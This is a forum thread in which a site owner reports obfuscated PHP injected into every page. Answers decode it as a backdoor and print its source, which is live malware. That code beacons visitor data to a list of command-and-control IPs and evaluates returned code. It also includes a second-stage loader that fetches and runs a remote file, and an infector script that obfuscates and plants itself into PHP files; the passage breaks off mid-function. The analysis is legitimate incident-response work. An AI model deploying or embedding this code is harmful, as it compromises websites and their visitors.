Is my site hacked?

I might be insane to write this here, but right now I'm just scared. IPage has 2 websites.

All PHP pages on both of my sites were changed early in the morning around 9am and they all have the following prefix

<?php /*db9fce8e7e3b4062309ef5d7c0193183_on*/ $TVSC95En77BPVJfUYlq9gaYajuT5lt9kfRNeNhsKeTp0tvLhH= array('1822','1839','1818','1829');$JN26Obrx7D= array('9042','9057','9044','9040','9059','9044','9038','9045','9060','9053','9042','9059','9048','9054','9053');$ENVOq0syj3C3itmE4ubWBPOxtQPQNixJVjoc9GAjz3dImpdg= array('1379','1378','1396','1382','1335','1333','1376','1381','1382','1380','1392','1381','1382');$cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K="eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0poVjFsblMwTkdiV1JYTldwa1IyeDJZbXc1YkdWSGJIcGtTRTF2U1d0a2JHUkZNV2hpVjBWcFMxTnNOMGxEUW0xa1Z6VnFaRWRzZG1KcFFuUmlNbEptV1RJNWRVdERVbWxrVjFsd1pUTk9NR05zT1hCamJWWjNZa2RHYWxwVFoybFFSMHAyV2tockswbHBkMmxRUjBwMldraHJLMGxwZDJ0WmJsWnRURU5TYW1KdVVtWmhRMnMzWVZkWlowdERVbXBpYmxKbVlVTkJPVkJUUVhoTFUwSTNTa2RLTVZwcFFUbEpTRTR3WTJ3NWNHTnRWbmRpUjBacVdsTm5hVkJIU25aYVNHc3JTV2wzYVZCSFNuWmFTR3NyU1dsQmRVbElUakJqYld4M1l6SjRhR015YUd4amVXZHJXREZPUmxWc1drWlZiSE5wV2pJNWRscERTbVJMVTNkcldXNVdiVXRVYzJkamJWWXdaRmhLZFVsRFVtbGtWMWszWmxoT01HTnNPWEJqYlZaM1lrZEdhbHBUWjJsUVF6bHBZakpTTlZCcFNYTkphbmQyV1cwNWEyVlVOR2xNUTFKcFpGZFpjMHBIVG5Wa1JqbHZTMVIwY0ZwcFFXOUtSMDUxWkVZNWIwbEVNRGxKUkVWd1NVaHphMWx1Vm0xSlJEQm5Zek5TZVZneWJIbGFXRUp6V1ZkT2JFdERTVGhNTWtwMldraHJLMGxwZUhwa1NFcHdZMGhPYzFsWVRtOWFXRTF2U2tZNVZGSldTbGRTVmtwaVNXMWtkbUl5VVdsWVUydDFTV3AzZGxsdE9XdGxWRFJwVEVOU2FXUlhXWEJQZVVKNVdsaFNNV050TkdkS1Iwb3hXbXAwT1dOdFZqQmtXRXAxU1VOU2FXUlhXVGRtVjFveFltMU9NR0ZYT1hWSlJ6bDNXVmMxY21GVFoydFpibFp0UzFoemExb3pjR1phVTBFNVNVZGFhR0pJVG14UGVWSnZXREozWjFCVFFtOWFWMFpyV2xoS2VsZ3llSEJqTTFGdlMxUjBjRnBwUVc5aFZ6Vm1XVmhLZVZsWWEyOUphMDUyWW01U2JHSnVVWFJTVnpWcVlqSlNjR0p0WXpaSlIyUTJZVmhCYVV4RFFXdGhSamx6UzFOcloyVjVRV3RhTTNCbVdsTkJPVWxJVW5sa1YxVTNabGRzYlVsRFoydGFNM0JtV2xOc04wcElVblJqUjFwMVdWY3hiRWxFTUdka1IxWjBZMGMxYUdKVFoybE1NMUowWTBOSmMwbERTa2RVTURocFMxUjBiV0ZYZUd4WU0wSXhaRVk1YW1JeU5UQmFWelV3WTNsbmEyUkhNWGRhYlRWb1lsZFZjMGxEVW1sa1YxbHdUM2xTTmxwRFFUbEpSMlEyWWpOQ2JHSnBaMnRrUnpGM1dtMDFhR0pYVlhOSlEwcDVTV2xyTjBwSFRuWmlibEpzWW01U2VrbEVNR2RhTTNCNVdsZEdhMHREVWpaYVEzZG5UVlJCZDAxRVFYZE5SRUZ3VDNsU2FtSXlOVEJhVnpVd1kzbEJPVWxITVhaYVJqbHFZakkwYjBwSFRuWmlibEpzWW01U2VrdFVkRzVsYlU1ellqTk9iRXREVWpaYVEyczNaRmMxYzJGWE5YSkxRMUl3WWxoQ2JXSnRSblJhVTJzM1NrZE9kbUp1VW14aWJsSjZTVVF3WjFvemNHeGliVTUyV2tkVmIwcEhUblppYmxKc1ltNVNla3RVZERsSlIxWnpZekpWWjJWNVVtcGlNalV3V2xjMU1HTjVRVGxKUnpGMldrWTVhbUl5Tkc5S1Iwb3hXbWxyTjJaVFVuTmFWelJuVUZOQ2VtUklTbk5hVnpSdlNrZE9kbUp1VW14aWJsSjZTMVIwYjFwWFJtdGFXRWx2U1d0T2RtSnVVbXhpYmxGMFZFZFdkVm96VW05UGFVRnBUR2xTYzFwWE5IQlBNMHBzWkVoV2VXSnBaMnRaTWpsMVpFZFdkV1JJVFhCUE16Qm5XbTVXZFZrelVuQmlNalJuVWpKV01GUlhSblJaVTJkd1pYbFNkR0l6VW05YVdFbG5VRk5CYVdRelpETk1hbXMxV1cxc01HTjVOV3BpTWpCcFR6TktiR1JJVm5saWFVRnJZbGM1TUdGSFZubFBNekYyV1d3NWVtUkhSbmxrUTJkcFlqTkNhR0p0ZEhCSmFXczNXbTVXZFZrelVuQmlNalJuV1Zkb2JXUlhVbTFpUjFvMldrZG9iV0ZJVFc5S1NFSm9TMWh6YTJKWFJuUlpVMEU1U1VWa2JHUkZNV2hpVjBWdlMxUnphMXB0YkhOYVUwRTVTVWhXZVdKSFZuVlpNamxyV2xOb1psZ3dXa3BVUlZabVdIbHJOMkZYV1dkTFIyeDZZekpXTUV0RFVtWlZNRlpUVm10V1UxZDVTa2xXUmxKUldEQm9VRlV4VVdsWVUydHdaWGxTYjJJelRqQkpSREJuU2tZNVZGSldTbGRTVmtwaVNXdG9WVlpHUW1aVFJUbFVWa05LWkU4ek1HZGFWM2g2V2xOQ04wcEhhSFpqTTFGblVGTkJhVWxxZERsaFYxbG5TMGRzZW1NeVZqQkxRMUptVlRCV1UxWnJWbE5YZVVwVFVsVXhVRlpGVm1aUlZWSkZWV2xLWkV0VGJEZEtSMngzU1VRd1owcEdPVlJTVmtwWFVsWktZa2xzU2taVVZUbFZVbFk1UWxKRlVsTkpiREEzWmxOQ2JHSklUbXhKU0hOcllWaEJaMUJUUVdsSmFuUTVZVmRaWjB0SGJIcGpNbFl3UzBOU1psVXdWbE5XYTFaVFYzbEtTVlpHVWxGWU1VcEdVbXRXVTFKV1NXbFlVMnR3WlhsU2VWcFhXV2RRVTBJeFkyMTRiR0p0VG5aYVIxVnZTa1k1VkZKV1NsZFNWa3BpU1d0b1ZWWkdRbVpWYTFaSFVsWktSbFZwU21STFZIUTVTVWRXYzJNeVZXZGxlVko1V2xkWloxQlRRV2xKYW5RNVlWZFpaMHRIYkhwak1sWXdTME5TWmxVd1ZsTldhMVpUVjNsS1NWWkdVbEZZTVZaVVVsWktabEZWWkVaVWJGRnBXRk5yY0dWNVVqRlpVMEU1U1VoV2VXSkhWblZaTWpscldsTm9lbVJJU2pCaU1uaDJaREpXZVV0RFVtWlZNRlpUVm10V1UxZDVTa2xXUmxKUldERldWRkpXU21aUlZXUkdWR3hSYVZoVGEzQlBNekJuV2xkNGVscFRRamRLU0Zab1NVUXdaMGxwU1RkbVYyeHRTVU5vY0dNelRteGtRMmRyV0RGT1JsVnNXa1pWYkhOcFZWWldSbFZzYkdaVk1WSlRVMVUxU0Vsc01IQkxXSE5yWTFoTloxQlRRakZqYlhoc1ltMU9kbHBIVlc5S1JqbFVVbFpLVjFKV1NtSkpiRVpXVWxaS1dsZ3hUbFZWYTJ4UFVubEtaRXRVZERsSlIxWnpZekpWWjJWNVVuaGplVUU1U1VOSmFVOHpNR3RrV0VweldIcEJaMUJUUVdsaFNGSXdZMFJ2ZGt4NVNXZE1hVUZyWTBkRk4wcElWbmxpUmpoNFNVUXdaMGxwT1hGYVYxSndURzVDYjJORU9USmFXRXA2WVZjNWRWQlVRVFZQVkVWdFlsYzVNR0ZIVm5sUVUwbG5UR2xTZEZsWE1XaEpRelJuU1dsYWJXRlhlR3hRVTBsblRHbEJhMXB0YkhOYVUwRjFTVU5KYldGSE9YcGtSREJwU1VNMFowcEhhSFpqTTFGblRHbEJhVXB0YkhkUVUwbG5UR2xCYTJGWVFXZE1hVUZwU201S2JGcHFNR2xKUXpSblNraEtiRnBwUVhWSlEwbHRaRmRGT1VscFFYVktTRlpvU1VNMFowbHBXbmhqZWpCcFNVTTBaMHBJUm5wUGVWSXdZMjVyWjFCVFFqQmpibFpzVHpKc2JVdERRbTFrVnpWcVpFZHNkbUpzT1d4bFIyeDZaRWhOYjBsdFRqRmpiWGhtWVZjMWNHUkRTWEJKUTJ3M1NrZE9iMGxFTUdkWk0xWjVZa1k1Y0dKdGJEQkxRMUl4WTIxNFprMURRWFZKUTFJeFkyMTRaazFUYXpkWk0xWjVZa1k1ZWxwWVVuWmpTRkZ2U2tkT2IweERRa1JXVmtwTlZERkNWVmd4U2taV1JsWlRWR3hTVTFGVk5WUlNhMVpUVEVOQmVFdFVkR3BrV0VweldETk9iR1JIT1hka1EyZHJXVEpuYzBsRlRsWlZhM2hRVlVaU1psWkZiRTVTVlRsV1ZrTjNaMDE1YXpkS1NGWnpaRU5CT1VsSVVubGhWekJ2V1ROV2VXSkdPV3hsUjFacVMwTlNhbUZEYTNCUGVWSXdZMjVyWjFCVFFtMVpWM2g2V2xSME9VbEhiRzFKUTJkdllWYzFjRmd5Wkd4a1EyZHBXVmQ0YzJJelpHWmtXRXB6V0RKYWRtTkhWblZKYVd0d1NVTlpiVWxEVWpCamJtdHdTVWh6YTJSWGVEQkpSREJuWkVoS2NHSlRhRUZhYld4eldsWTVibHBZVW1aWk1qbDFaRWRXZFdSSVRXOUtTRlo1WWtZNGQwbEROR2RLU0ZaNVlrWTRlRXRUYXpkS1NGSjVaVk5CT1VsSFdtaGlTRTVzVHpNeGNGcHBaMnRrU0VvMVMxaHphMXB1UVdkUVUwSnRZekk1YW1FeU9YZGFWelJ2U2toQ2FFeERRVFJOUTNkblNrZFdlV050TlhaTVEwRnJXbGhLZVdNelVubE1RMEY2VFVOck4yRlhXV2RMUTFKdFkwTnJaMlY1VW5aa1dGRm5VRk5CYVZJd1ZsVkpRMUl4WTIxNFprMVRRa2xXUmxKUlRIcEZkVTFHZUhsWVJ6UnBUM2xTZG1SWVVXZE1hakJuU1d0b2RtTXpVVFpKUTFKM1dWWjRlVmhITkdsUGVWSjJaRmhSWjB4cU1HZEphMDUyWW0wMWJGa3pVbkJpTWpRMlNVVk9jMkl6VG14WVNFcGpZbXg0ZVZoSE5HbFBNbG96WTIxc01GcFRaMnRhYmtGelNVTlNkbVJZVVhCUGVWSjVXbGhSWjFCVFFXbEphblF6WVVkc2MxcFRRVzlKVjFwc1lqSlpiMHBIV25kTFUydG5aWGxTZVZwWVVXZEpRelE1U1VOQ2JWb3lWakJqZVdkcldtNUJjMGxFUlhsUFEyczNabGRhYW1KSE9YcGFVMmRyV201QmNFOTVVakZpU0ZGblVGTkNNR050YkhSTFNFNHhXVzVPTUdOcFoydGpiVll3VEVOQ2VtUklTbmRpTTAxdlNraEtiR1JEZDJkSmJIaDVXRWMxWTJOc2VIVkphV3RuUzNsQk1FdFRhemRtV0RCblNVZHNiVWxEYUhwa1NFcDNZak5OYjBwSVZuTmtRM2RwV2xoYWFHSkRTWEJKUTBVNVVGTkNiVmxYZUhwYVUydzNTa2h2WjFCVFFucGtTRXB3WTBoT2MxbFlUbTlhV0Uxdll6TlNlVmd6U214alIzaG9XVEpWYjBsdFZqSlpWM2RwVEVOSmFVeERVakZpU0ZGd1MxUnpaMXBZV21oaVEyZHJaV2xyTjBsSFZqUmhXRkZ2UzFSME9XRlhXV2RMU0U0d1kyNUNkbU41WjJ0a1YzZ3dURU5LYkZsdE5XaEphV3RuU1ZRd09VbEhXbWhpU0U1c1MxaHphMWd4VGtaVmJGcEdWV3h6YVZveU9YWmFRMHBrU1VRd1oyTXpVbmxZTTBwc1kwZDRhRmt5Vlc5SmJWWnBZbTFGYVV4RFNXbE1RMUl4WWtoUmNFOHpTbXhrU0ZaNVltbENNR051Vm14UE16RnNZa2hPYkVsSWRIbGFXRkl4WTIwMFoxcHRSbk5qTWxVM1psZ3dhMXB0UmpCaFIxWjVUV3gwWkVsRU1HZEphbU0wVEdwUk1reHFSVE5OZVRSNFRrTkpOMHBIV21oa1IyaHNZMnBLWWxoVFFUbEpRMGw0VG5wWmRVOVROSGxOVkdkMVRWUnJlRWxxYzJ0YWJVWXdZVWRXZVUxc2RHUkpSREJuU1dwcmVFeHFTWGxQUXpSNFRsUlJkVTFxVlRCSmFuTnJXbTFHTUdGSFZubE5iSFJrU1VRd1owbHFZek5NYW1kNFRHcEpNRTFUTkhsT1ZFMXBUM2xTYlZsWVVtOWFXRWw1VnpFd1oxQlRRV2xOVkdjd1RHcG5lVXhxUlhoT2VUUjRUVlJCYVU5NVVtMVpXRkp2V2xoSmVWY3hNR2RRVTBGcFRrUlpkVTVETkhsTlJFbDFUMVJOYVU5NVVtMVpXRkp2V2xoSmVWY3hNR2RRVTBGcFRrUlpkVTFxVVRWTWFsVTBUR3BGZWs1VFNUZEtSMXBvWkVkb2JHTnFTbUpZVTBFNVNVTkplRTU2V1hWUFV6UjVUa1JGZFUxVVZYZEphbk5yV20xR01HRkhWbmxOYkhSa1NVUXdaMGxxVVRKTWFrMHpUR3BGTWs5VE5ERk9hVWszU2tkYWFHUkhhR3hqYWtwaVdGTkJPVWxEU1RCT2FUUjZUVU0wTUUxVE5EVlBVMGszU2tkYWFHUkhhR3hqYWtwaVdGTkJPVWxEU1RWT1F6UjVUa1JKZFUxcVZURk1hazB4U1dwemExcHRSakJoUjFaNVRXeDBaRWxFTUdkSmFrVXpUME0wZUU1cVNYVk5WRWsxVEdwSmVVMTVTVGRLUjFwb1pFZG9iR05xU21KWVUwRTVTVU5KTTA5RE5EQk9lVFI0VDBSUmRVMTZUV2xQZVZKdFdWaFNiMXBZU1hsWE1UQm5VRk5CYVUxNlJYVk5WR2N3VEdwSmVrNURORFZPYVVrM1l6Sm9NVnB0V25OYVUyZHJXbTFHTUdGSFZubE5hV3MzV20wNWVWcFhSbXBoUTJkcldtMUdNR0ZIVm5sTmFVSm9ZM2xCYTJSWVNYQmxNbXh0U1VObloxbFhhRzFrVjFKdFlrZGFObHBIYUcxaFNFMXZTa2hXZVV0VFFYQkpTSE5uV1c1S2JGbFhjMmRQTXpFNVpsRTlQU0lwS1RzZyIpKTsg")); ";if (!function_exists("IOvqWhUNav1vXbeu")){ function IOvqWhUNav1vXbeu($eylKbLsazo94Ea5Vhz79GggPPk0Fn4I8sTIuv1vU,$iPKwKwD9uDGAJlgUcL87){$pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW = '';foreach($eylKbLsazo94Ea5Vhz79GggPPk0Fn4I8sTIuv1vU as $vwdHH9YC8Qv5SkhOG4ZoO9){$pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW .= chr($vwdHH9YC8Qv5SkhOG4ZoO9 - $iPKwKwD9uDGAJlgUcL87);}return $pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW;}$NfcYRc72PjdDxDTcZ9Y6 = IOvqWhUNav1vXbeu($TVSC95En77BPVJfUYlq9gaYajuT5lt9kfRNeNhsKeTp0tvLhH,1721);$c6gts3vwnaRtcGbfD4VN7obA8 = IOvqWhUNav1vXbeu($JN26Obrx7D,8943);$n82mSuiYNAS8X68E = IOvqWhUNav1vXbeu($ENVOq0syj3C3itmE4ubWBPOxtQPQNixJVjoc9GAjz3dImpdg,1281);$TargEl = $c6gts3vwnaRtcGbfD4VN7obA8('$bigiJelZcd',$NfcYRc72PjdDxDTcZ9Y6.'('.$n82mSuiYNAS8X68E.'($bigiJelZcd));');$TargEl($cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K);} /*db9fce8e7e3b4062309ef5d7c0193183_off*/ ?>

      

I tried to get iPage support and they have no idea what happened. They just created a support ticket for me, which will be reviewed within 48 hours!

UPDATE

Got an email about the hack

From: Poor Victim hahahaha@gmail.com

Message: Why is this code on my server? why are you hacking my files ??? this code points to you !!! Prepare for trial

if (! function_exists ("GetMama")) {function mod_con ($ buf) {str_ireplace ("," ", $ buf, $ cnt_h); if ($ cnt_h == 1) {$ buf = str_ireplace (", "" . stripslashes ($ _ SERVER ["good"]), $ buf); return $ buE; } str_ireplace ("," ", $ buf, $ cnt_h), if ($ cnt_h == 1) {$ buf = str_ireplace (" ", stripslashes ($ _ SERVER [" good "])." ", $ buE) ; return $ buf;} return $ buf;} function opanki ($ buf) {$ gz_e = false; $ h_l = headers_list (); if (in_array ("Content-Encoding: gzip", $ h_l)) {$ gz_e = true;} if ($ gz_e) {$ tmpfname = tempnam ("/ tmp", "FOO"); file_put_contents ($ tmpfname, $ buf); $ zd = gzopen ($ tmpfname, "r"); $ contents = gzread ($ zd, 10000000); $ contents = mod_con ($ contents); gzclose ($ zd);unlink ($ tmpfname); $ contents = gzencode ($ contents); } else {$ contents = mod_con ($ buf); } $ len = strlen ($ contents); header ("Content-Length:". $ len); return ($ contents); } GetMama () function {$ mother = "www.99bits.com"; return $ mother; } ob_start ("opanki"); function ahfudflfzdhfhs ($ pa) {$ mama = GetMama (); $ file = urlencode (FILE); if (isset ($ _ SERVER ["HTTP_HOST"])) {$ host = $ _SERVER ["HTTP_HOST"]; } else {$ host = ""; } if (isset ($ _ SERVER ["REMOTE_ADDR"])) {$ ip = $ _SERVER ["REMOTE_ADDR"]; } else {$ ip = ""; } if (isset ($ _ SERVER ["HTTP_REFERER"])) {$ ref = UrlEncode ($ _ SERVER ["HTTP_REFERER"]); } else {$ ref = ""; } if (isset ($ _ SERVER ["HTTP_USER_AGENT"])) {$ ua = UrlEncode (strtolower ($ _ SERVER ["HTTP_USER_AGENT"])); } else {$ ua = ""; } if (isset ($ _ SERVER ["QUERY_STRING"])) {$ qs = UrlEncode ($ _ SERVER ["QUERY_STRING"]); } else {$ qs = ""; } $ url_0 = "http: //". $ pa; $ url_1 = "/jedi.php?version=0991&mother=". $ mom. "& file =". $ file. "& host = ". $ host." & ip = ". $ ip." & ref = ". $ ref." & ua = ". $ ua." & qs = ". $ qs; $ try = true if (function_exists (" curl_init ")) {$ ch = curl_init ($ url_0. $ url_1); curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ ch, CURLOPT_TIMEOUT, 3); $ ult = trim (curl_exec ($ ch)); $ try = false;} if ((ini_get ("allow_url_fopen")) && $ try) {$ ult = trim (@file_get_contents ($ url_0. $ url_1)); $ try = false;} If ($ try) {$ fp = fsockopen ($ pa, 80, $ errno, $ errstr, 30), if ($ fp) {$ out = "GET $ url_1 HTTP / 1.0 \ r \ n "; $ out. =" Host: $ pa \ r \ n "; $ out. =" Connection: Close \ r \ n \ r \ n "; fwrite ($ fp, $ out); $ ret = ""; while (! Feof ($ fp)) {$ ret. = fgets ($ fp, 128);} fclose ($ fp);$ ult = trim (substr ($ ret, strpos ($ ret, "\ r \ n \ r \ n") + 4)); }} if (strpos ($ ult, "eval")! == false) {$ z = stripslashes (str_replace ("eval", "", $ ult)); Eval ($ r); Output(); } if (strpos ($ ult, "ebna")! == false) {$ _SERVER ["good"] = str_replace ("ebna", "", $ ult); return true; } else {return false; }} $ father2 [] = "78.46.173.14"; $ father2 [] = "176.9.218.191"; $ father2 [] = "91.228.154.254"; $ father2 [] = "77.81.241.253"; $ father2 [] = "184.82.117.110"; $ father2 [] = "46.4.202.93"; $ father2 [] = "46.249.58.135", $ father2 [] = "176.9.241.150"; $ father2 [] = "46.37.169.56"; $ father2 [] = "46.30.41.99"; $ father2 [] = "94.242.255.35";$ father2 [] = "178.162.129.223"; $ father2 [] = "78.47.184.33"; $ father2 [] = "31.184.234.96"; shuffle ($ father2); foreach ($ father2 as $ ur) {if (ahfudflfzdhfhs ($ ur)) {break; }}}

Sent from (ip address): 64.118.163.18 (64.118.163.18) Date / Time: April 9, 2012 7:15 pm Based on (referent): http://www.99bits.com/contact-us/ Usage ( user agent): Mozilla / 5.0 (Macintosh, Intel Mac OS X 10_7_3) AppleWebKit / 535.19 (KHTML like Gecko) Chrome / 18.0.1025.151 Safari / 535.19

Thanks to each of you for all the help and knowledge. For some strange and unknown reason, my blog was targeting this hack attempt. I closed the blog for a while until I can clean all files (since all my PHP files are infected).

+3


source to share


4 answers


In its current form, the script has the following command and control servers ("c & c"):

$father2[] = "78.46.173.14";
$father2[] = "176.9.218.191";
$father2[] = "91.228.154.254";
$father2[] = "77.81.241.253";
$father2[] = "184.82.117.110";
$father2[] = "46.4.202.93";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "46.30.41.99";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "78.47.184.33";
$father2[] = "31.184.234.96";

      

The script will randomize their order on each run. Then it tries to send a GET request containing these variables

$_SERVER["HTTP_HOST"]
$_SERVER["REMOTE_ADDR"]
$_SERVER["HTTP_REFERER"]
$_SERVER["HTTP_USER_AGENT"]
$_SERVER["QUERY_STRING"]
__FILE__

      

to the first c & c server, if the response does not contain eval

or ebna

(or the server is down) it tries to use the next c & c server, etc.

If the server returns c & c: ebna <somestring>

, <somestring>

will be placed in the body tag of your website. This way a hacker can insert arbitrary html / js code.



Otherwise, when the server c & c returns eval <somestring>

, <somestring>

eval () will be passed. This way a hacker can even execute arbitrary php code.

I was able to get the server c & c to return an eval response by simply passing all the url parameters like : http://<server-ip>/jedi.php

, here is the answer:

eval $try = true;
if (function_exists("curl_init")) {
    $ch = curl_init('http://2brewers.com/99.txt');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 3);
    $ult = trim(curl_exec($ch));
    $try = false;
}
if ((ini_get('allow_url_fopen')) && $try) {
    $ult = trim(@file_get_contents('http://2brewers.com/99.txt'));
    $try = false;
}
if ($try) {
    $fp = fsockopen('2brewers.com', 80, $errno, $errstr, 30);
    if ($fp) {
        $out = "GET /99.txt HTTP/1.0\r\n";
        $out. = "Host: 2brewers.com\r\n";
        $out. = "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
        $ret = '';
        while (!feof($fp)) {
            $ret. = fgets($fp, 128);
        }
        fclose($fp);
        $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
    }
}
$xx = 'ev'.'al';
$_FILE = create_function('$_', $xx.'($_);');
$_FILE($ult);

      

which loads and executes http://2brewers.com/99.txt

, which looks like this:

function get_file_extension($file_name) {
    return substr(strrchr($file_name, '.'), 1);
}

function pass_gen($dol) {
    $source[0] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $source[1] = "0123456789";
    $length = rand(5, 50);
    $passwordlen = intval($length) - 1;
    $use = implode("", $source);
    $max_num = strlen($use) - 1;
    $rp = '';
    for ($i = 0; $i < $passwordlen; $i++) {
        $x = rand(0, $max_num);
        $rp. = $use[$x];
    }
    if ($dol) {
        return '$'.$source[0][rand(0, strlen($source[0]) - 1)].$rp;
    } else {
        return $source[0][rand(0, strlen($source[0]) - 1)].$rp;

    }
}

function GetMass($text, $code, $massname) {
    $a = str_split($text);
    foreach($a as $b) {
        $evmas[] = ord($b) + $code;
    }
    $z = $massname."= array('".implode("','", $evmas)."');";
    return $z;
}


function Codee($code) {


    $coo = 'if (!function_exists("F1")){ function F1($v6,$v7){$v8 = \'\';foreach($v6 as $v9){$v8 .= chr($v9 - $v7);}return $v8;}$v1 = F1($mas1,$code1);$v2 = F1($mas2,$code2);$v3 = F1($mas3,$code3);$v4 = $v2(\'$v5\',$v1.\'(\'.$v3.\'($v5));\');$v4($v0);}';

    $f1 = pass_gen(false);
    $coo = str_replace('F1', $f1, $coo);
    $v1 = pass_gen(true);
    $coo = str_replace('$v1', $v1, $coo);
    $v2 = pass_gen(true);
    $coo = str_replace('$v2', $v2, $coo);
    $v3 = pass_gen(true);
    $coo = str_replace('$v3', $v3, $coo);
    $v4 = pass_gen(true);
    $coo = str_replace('$v4', $v4, $coo);
    $v5 = pass_gen(true);
    $coo = str_replace('$v5', $v5, $coo);
    $v6 = pass_gen(true);
    $coo = str_replace('$v6', $v6, $coo);
    $v7 = pass_gen(true);
    $coo = str_replace('$v7', $v7, $coo);
    $v8 = pass_gen(true);
    $coo = str_replace('$v8', $v8, $coo);
    $v9 = pass_gen(true);
    $coo = str_replace('$v9', $v9, $coo);
    $v0 = pass_gen(true);
    $coo = str_replace('$v0', $v0, $coo);
    $mas1 = pass_gen(true);
    $coo = str_replace('$mas1', $mas1, $coo);
    $mas2 = pass_gen(true);
    $coo = str_replace('$mas2', $mas2, $coo);
    $mas3 = pass_gen(true);
    $coo = str_replace('$mas3', $mas3, $coo);
    $code1 = rand(1000, 10000);
    $coo = str_replace('$code1', $code1, $coo);
    $code2 = rand(1000, 10000);
    $coo = str_replace('$code2', $code2, $coo);
    $code3 = rand(1000, 10000);
    $coo = str_replace('$code3', $code3, $coo);

    for ($i = 0; $i < 3; $i++) {
        $code = base64_encode($code);
        $code = 'eval(base64_decode("'.$code.'")); ';
    }
    $code = base64_encode($code);


    $z = GetMass('eval', $code1, $mas1);
    $z. = GetMass('create_function', $code2, $mas2);
    $z. = GetMass('base64_decode', $code3, $mas3);
    $z. = $v0.'="'.$code.'";';
    $z. = $coo;
    return $z;

}

function modify($fname) {


    $tmp = file_get_contents($fname);
    $md_start = md5($tmp);

    chmod($fname, 0666);
    $md = md5($fname);



    $pattern = '/function GetMama\(\).*\]\}\)\)\{break;\}\}/i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pattern = '/\/\*god_mode_on.*god_mode_off\*\//i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pattern = '/\/\*'.$md.'_on.*'.$md.'_off\*\//i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pattern = '/<\?php[\s]*\?>/i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pos = strpos($tmp, 'GetMama');
    $pos2 = strpos($tmp, 'god_mode_on');
    if (($pos === false) && ($pos2 === false)) {

        $code_t = 'if (!function_exists("GetMama")){  function mod_con($buf){str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;}str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;}return $buf;}function opanki($buf){$gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}if ($gz_e){$tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);} else {$contents = mod_con($buf);}$len = strlen($contents);header("Content-Length: ".$len);return($contents);} function GetMama(){$mother = "###";return $mother;}ob_start("opanki");function ahfudflfzdhfhs($pa){$mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){$host = $_SERVER["HTTP_HOST"];} else {$host = "";}if (isset($_SERVER["REMOTE_ADDR"])){$ip = $_SERVER["REMOTE_ADDR"];} else {$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){$ref = urlencode($_SERVER["HTTP_REFERER"]);} else {$ref = "";}if (isset($_SERVER["HTTP_USER_AGENT"])){$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {$ua = "";}if (isset($_SERVER["QUERY_STRING"])){$qs = urlencode($_SERVER["QUERY_STRING"]);} else {$qs = "";}$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){$ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false;} if ((ini_get("allow_url_fopen")) && $try) {$ult = trim(@file_get_contents($url_0 . $url_1));$try = false;}if($try){$fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) {$ret  .=  fgets($fp, 128);}fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));}}  if (strpos($ult,"eval") !== false){$z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();}if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);return true;}else {return false;}}$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = "31.184.234.96";shuffle($father2);foreach($father2 as $ur){if ( ahfudflfzdhfhs($ur) ) { break ;}}}';
        $mama = 'wtf';
        $mama = $_SERVER["HTTP_HOST"];
        $code_t = str_replace('###', $mama, $code_t);
        $code = '<'.'?php ';

        $prob = rand(5, 500);

        for ($i = 0; $i < 700 + $prob; $i++) {
            $code = $code.' ';
        }


        $code_t = Codee($code_t);


